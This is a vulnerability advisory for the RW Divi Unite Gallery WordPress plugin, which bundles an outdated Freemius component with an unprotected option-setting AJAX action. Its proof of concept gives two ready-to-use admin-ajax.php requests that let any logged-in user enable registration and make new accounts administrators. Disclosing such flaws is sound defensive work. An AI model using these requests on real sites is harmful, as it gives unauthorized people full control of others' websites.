RW Divi Unite Gallery <= 1.0 – Security Bypass via Outdated Freemius

Description

The plugin is vulnerable to a security bypass due to the use of a known vulnerable component, Freemius < 2.2.4. The plugin uses Freemius 1.0.0 and is therefore vulnerable. The core issue that causes the vulnerability is in the _set_db_option function, which is exposed to any authenticated user with no authorization checks, allowing for WordPress site settings to be manipulated and administrative access to the site to be gained. The Freemius issue was originally disclosed in February of 2019, see references.

Proof of Concept

As any logged in user:

1. Enable new user registrations by browsing to:
https://test0.local/wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=users_can_register&option_value=1

This should result in a 'success: true' message.

2. Set the default role for new user registrations to Administrator by browsing to:
https://test0.local/wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=default_role&option_value=administrator

This should result in a 'success: true' message.

3. Register a new user
The created user has an administrator role and full control of the site.